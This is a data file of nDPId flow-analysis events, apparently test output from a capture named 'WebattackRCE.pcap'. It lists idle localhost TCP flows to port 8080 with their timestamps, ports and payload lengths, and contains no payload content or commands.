-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277122,"flow_last_seen":1576420277122,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50116,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277123,"flow_last_seen":1576420277123,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50118,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277126,"flow_last_seen":1576420277126,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50120,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277127,"flow_last_seen":1576420277127,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50122,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277128,"flow_last_seen":1576420277128,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50124,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277130,"flow_last_seen":1576420277130,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50126,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277134,"flow_last_seen":1576420277134,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50128,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277136,"flow_last_seen":1576420277136,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50130,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277141,"flow_last_seen":1576420277141,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50132,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277142,"flow_last_seen":1576420277142,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50134,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277144,"flow_last_seen":1576420277144,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50136,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277145,"flow_last_seen":1576420277145,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50138,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277148,"flow_last_seen":1576420277148,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50140,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277153,"flow_last_seen":1576420277153,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50142,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277155,"flow_last_seen":1576420277155,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50144,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277157,"flow_last_seen":1576420277157,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50146,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277159,"flow_last_seen":1576420277159,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277160,"flow_last_seen":1576420277160,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277162,"flow_last_seen":1576420277162,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277164,"flow_last_seen":1576420277164,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":324,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277190,"flow_last_seen":1576420277190,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277193,"flow_last_seen":1576420277193,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277194,"flow_last_seen":1576420277194,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277196,"flow_last_seen":1576420277196,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277198,"flow_last_seen":1576420277198,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277200,"flow_last_seen":1576420277200,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277201,"flow_last_seen":1576420277201,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277203,"flow_last_seen":1576420277203,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50206,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
